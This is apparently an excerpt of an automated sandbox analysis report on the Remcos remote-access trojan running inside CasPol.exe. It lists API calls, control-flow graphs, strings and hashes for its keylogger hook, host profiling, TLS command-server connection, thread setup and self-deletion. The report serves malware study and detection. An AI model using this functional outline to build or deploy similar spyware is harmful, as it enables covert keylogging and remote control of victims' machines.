                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                              • GetLastError.KERNEL32 ref: 00409A1B
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                              • TranslateMessage.USER32(?), ref: 00409A7A
                                                                              • DispatchMessageA.USER32(?), ref: 00409A85
                                                                              Strings
                                                                              • Keylogger initialization failure: error , xrefs: 00409A32
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                              • String ID: Keylogger initialization failure: error
                                                                              • API String ID: 3219506041-952744263
                                                                              • Opcode ID: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                              • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                              • Opcode Fuzzy Hash: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                              • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                              • API String ID: 2281282204-3981147832
                                                                              • Opcode ID: b52ee1c3eed207540671a46520d926d2e116572944b131f6506924d3268894c8
                                                                              • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                              • Opcode Fuzzy Hash: b52ee1c3eed207540671a46520d926d2e116572944b131f6506924d3268894c8
                                                                              • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1418 404915-404924 1419 4049b1 1418->1419 1420 40492a-404931 1418->1420 1421 4049b3-4049b7 1419->1421 1422 404933-404937 1420->1422 1423 404939-404940 1420->1423 1424 404987-4049af CreateEventA CreateThread 1422->1424 1423->1424 1425 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1423->1425 1424->1421 1425->1424
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                              Strings
                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$EventLocalThreadTime
                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                              • API String ID: 2532271599-1507639952
                                                                              • Opcode ID: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                              • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                              • Opcode Fuzzy Hash: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                              • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                              APIs
                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                              • String ID:
                                                                              • API String ID: 1815803762-0
                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                              APIs
                                                                              • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Name$ComputerUser
                                                                              • String ID:
                                                                              • API String ID: 4229901323-0
                                                                              • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                              • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 48 40dc96-40dca7 call 401eea 23->48 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 79->90 91 40d9ae-40d9b0 79->91 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 92 40d9c0-40d9cc call 41a463 90->92 93 40d9be 90->93 96 40dc95 91->96 103 40d9d5-40d9d9 92->103 104 40d9ce-40d9d0 92->104 93->92 96->48 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 128 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 129 40da2d call 4069ba 107->129 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 128->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 128->164 129->128 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 199 40dbf3 178->199 200 40dbe6-40dbf1 call 436050 178->200 188->163 203 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 199->203 200->203 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 203->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->96 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                              APIs
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                              • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                              • API String ID: 2830904901-3665108517
                                                                              • Opcode ID: e8f975fe8cd26f83ea3826aa9307ec84712a60696ef91328ed9c94542da3aec6
                                                                              • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                              • Opcode Fuzzy Hash: e8f975fe8cd26f83ea3826aa9307ec84712a60696ef91328ed9c94542da3aec6
                                                                              • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 582 414b54-414b66 call 4047eb call 4020b4 559->582 565 4142ca-4142d8 call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a686 560->566 578 4142dd-4142df 565->578 566->582 581 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 578->581 578->582 647 414434-414441 call 40541d 581->647 648 414446-41446d call 401e8f call 412513 581->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 582->596 597 414b8e-414b96 call 401d8c 582->597 596->597 597->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->582
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                              • WSAGetLastError.WS2_32 ref: 00414249
                                                                              • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                              • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                              • API String ID: 524882891-2450167416
                                                                              • Opcode ID: c1406c1ba84d9b4e39cfb0280f400b36e783a56c653216b1d9310f7a20faee01
                                                                              • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                              • Opcode Fuzzy Hash: c1406c1ba84d9b4e39cfb0280f400b36e783a56c653216b1d9310f7a20faee01
                                                                              • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00409E62
                                                                                • Part of subcall function 00409D97: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                • Part of subcall function 00409D97: CloseHandle.KERNELBASE(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                              • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00409E9E
                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00409EAF
                                                                              • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 00409EC6
                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                              • API String ID: 3795512280-3163867910
                                                                              • Opcode ID: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                              • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                              • Opcode Fuzzy Hash: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                              • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1022 40428c-4042ad connect 1023 4043e1-4043e5 1022->1023 1024 4042b3-4042b6 1022->1024 1025 4043e7-4043f5 WSAGetLastError 1023->1025 1026 40445f 1023->1026 1027 4043da-4043dc 1024->1027 1028 4042bc-4042bf 1024->1028 1025->1026 1032 4043f7-4043fa 1025->1032 1029 404461-404465 1026->1029 1027->1029 1030 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1028->1030 1031 4042eb-4042f5 call 420151 1028->1031 1030->1031 1044 404306-404313 call 420373 1031->1044 1045 4042f7-404301 1031->1045 1034 404439-40443e 1032->1034 1035 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1032->1035 1040 404443-40445c call 401f66 * 2 call 41a686 1034->1040 1035->1026 1040->1026 1057 404315-404338 call 401f66 * 2 call 41a686 1044->1057 1058 40434c-404357 call 420f34 1044->1058 1045->1040 1083 40433b-404347 call 420191 1057->1083 1069 404389-404396 call 4202ea 1058->1069 1070 404359-404387 call 401f66 * 2 call 41a686 call 420592 1058->1070 1080 404398-4043bb call 401f66 * 2 call 41a686 1069->1080 1081 4043be-4043d7 CreateEventW * 2 1069->1081 1070->1083 1080->1081 1081->1027 1083->1026
                                                                              APIs
                                                                              • connect.WS2_32(?,?,?), ref: 004042A5
                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                              • API String ID: 994465650-2151626615
                                                                              • Opcode ID: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                              • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                              • Opcode Fuzzy Hash: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                              • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                              • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                              • String ID:
                                                                              • API String ID: 3658366068-0
                                                                              • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                              • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                              • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                              • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                              • Sleep.KERNELBASE(000001F4), ref: 0040A461
